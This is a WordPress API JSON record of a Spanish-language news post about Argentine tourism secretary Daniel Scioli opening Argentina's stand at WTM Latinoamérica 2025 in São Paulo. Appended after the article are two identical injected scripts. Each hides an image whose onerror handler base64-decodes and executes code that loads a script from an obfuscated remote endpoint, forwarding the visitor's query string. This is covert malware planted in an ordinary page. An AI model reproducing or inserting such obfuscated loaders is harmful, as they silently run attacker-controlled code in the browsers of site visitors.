{"id":5066,"date":"2025-04-15T08:10:57","date_gmt":"2025-04-15T11:10:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5066"},"modified":"2025-08-13T23:36:03","modified_gmt":"2025-08-14T02:36:03","slug":"scioli-a-empresarios-turisticos-ustedes-son-los-que-tienen-la-capacidad-para-generar-trabajo-e-inversiones","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5066","title":{"rendered":"Scioli a empresarios tur\u00edsticos: \u201cUstedes son los que tienen la capacidad para generar trabajo e inversiones\u201d"},"content":{"rendered":"\n<p><strong><em>El funcionario argentino viaj\u00f3 a Brasil para fortalecer la integraci\u00f3n y el intercambio del sector con ese pa\u00eds.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>, particip\u00f3 en&nbsp;<strong>World Travel Market (WTM) Latinoam\u00e9rica 2025<\/strong>, uno de los principales encuentros tur\u00edsticos de la regi\u00f3n, donde inaugur\u00f3 el&nbsp;<strong>stand de Argentina<\/strong>. La feria, que se desarrolla en&nbsp;<strong>San Pablo, Brasil,<\/strong>&nbsp;hasta el pr\u00f3ximo mi\u00e9rcoles, tiene como ejes centrales los cambios tecnol\u00f3gicos y las oportunidades de inversi\u00f3n.<\/p>\n\n\n\n<p><strong>Sclioli<\/strong>&nbsp;asegur\u00f3:&nbsp;<em>\u201cLa innovaci\u00f3n y la tecnolog\u00eda son pilares fundamentales de los desaf\u00edos que tenemos\u201d<\/em>, a la vez que celebr\u00f3 haber generado las condiciones&nbsp;<em>\u201cpara que 50 empresarios hayan venido con las mejores expectativas para promover la integraci\u00f3n tur\u00edstica entre Argentina y Brasil\u201d<\/em>.<\/p>\n\n\n\n<p>El secretario adelant\u00f3 que&nbsp;<em>\u201cen Semana Santa, se est\u00e1 previendo un 90 por ciento de ocupaci\u00f3n en los principales destinos tur\u00edsticos\u201d<\/em>&nbsp;y les dijo a los miembros del sector privado, representados por el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>:&nbsp;<em>\u201cUstedes son los que tienen la capacidad para generar trabajo e inversiones y llevar oportunidades a cada pueblo: esa es la fuerza del turismo\u201d<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/feria_wtm20251.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>El funcionario tambi\u00e9n record\u00f3 que&nbsp;<em>\u201cel presidente&nbsp;<strong>Milei<\/strong>&nbsp;tom\u00f3 una decisi\u00f3n de Estado clave: convertir a la&nbsp;<strong>Argentina<\/strong>&nbsp;en un polo de desarrollo tecnol\u00f3gico a la vanguardia\u201d<\/em>.&nbsp;<em>\u201cEl turismo tiene este gran desaf\u00edo de modernizarse, facilitar los servicios y ser m\u00e1s competitivo\u201d<\/em>, puntualiz\u00f3 y finaliz\u00f3:&nbsp;<em>\u201c<strong>Argentina<\/strong>&nbsp;nos encuentra bien preparados. Lo que se viene tiene que ver con esto, con modernizar cada vez m\u00e1s a nuestro pa\u00eds en servicios y prestadores\u201d<\/em>, argument\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/reunion_wtm2025.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>En la jornada realiz\u00f3 el lanzamiento de la&nbsp;<strong>temporada de nieve 2025<\/strong>&nbsp;y las actividades que se esperan en ese \u00e1mbito; y se anunciaron la&nbsp;<strong>Conferencia de Monta\u00f1a y Nieve de las Am\u00e9ricas<\/strong>, que tendr\u00e1 lugar en&nbsp;<strong>Neuqu\u00e9n, del 29 al 30 de agosto<\/strong>, y la convenci\u00f3n&nbsp;<strong>BRAZTOA 2025<\/strong>, a llevarse a cabo en&nbsp;<strong>C\u00f3rdoba, del 23 al 27 de septiembre<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/reunion_wtm20252.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Adem\u00e1s,&nbsp;<strong>Scioli<\/strong>&nbsp;se reuni\u00f3 con el secretario de Turismo de San Pablo,&nbsp;<strong>Roberto Da Lucena<\/strong>, con quien convers\u00f3 sobre los temas de la agenda com\u00fan de ambos pa\u00edses; y con el intendente de Bariloche,&nbsp;<strong>Walter Cort\u00e9s<\/strong>.<\/p>\n\n\n\n<p>Por otra parte, el secretario mantuvo audiencias con con representantes de&nbsp;<strong>Azul L\u00edneas A\u00e9reas<\/strong>&nbsp;\u2014que mantendr\u00e1&nbsp;<strong>5 vuelos semanales<\/strong>&nbsp;desde&nbsp;<strong>3 ciudades brasile\u00f1as<\/strong>&nbsp;a&nbsp;<strong>Bariloche<\/strong>&nbsp;y sumar\u00e1 a&nbsp;<strong>Mendoza<\/strong>&nbsp;como destino desde&nbsp;<strong>San Pablo<\/strong>\u2014,&nbsp;<strong>Aerol\u00edneas Argentinas<\/strong>&nbsp;y la corporaci\u00f3n&nbsp;<strong>CVC<\/strong>&nbsp;\u2014grupo de viajes que opera en Brasil y Argentina, con marcas como Al Mundo, Biblos y Ola\u2014.<\/p>\n\n\n\n<p>La feria&nbsp;<strong>WTM Latinoam\u00e9rica<\/strong>&nbsp;es la segunda m\u00e1s importante de la regi\u00f3n despu\u00e9s de&nbsp;<strong>FIT Argentina<\/strong>. Se presenta como un espacio de oportunidades de negocios e inversi\u00f3n, que ofrece acceso a compradores calificados e influenciadores de la industria de viajes y turismo. Convoca a profesionales de agencias de viajes, operadores tur\u00edsticos, alojamientos, medios de transporte, cruceros, productos de lujo y tecnolog\u00eda, entre otros.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El funcionario argentino viaj\u00f3 a Brasil para fortalecer la integraci\u00f3n y el intercambio del sector con ese pa\u00eds. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;Daniel Scioli, particip\u00f3 en&nbsp;World Travel Market (WTM) Latinoam\u00e9rica 2025, uno de los principales encuentros tur\u00edsticos de la regi\u00f3n, donde inaugur\u00f3 el&nbsp;stand de Argentina. La feria, que se desarrolla [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5067,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,21],"tags":[],"class_list":{"0":"post-5066","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5066"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5066"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5066\/revisions"}],"predecessor-version":[{"id":6518,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5066\/revisions\/6518"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5067"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5066"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5066"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5066"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}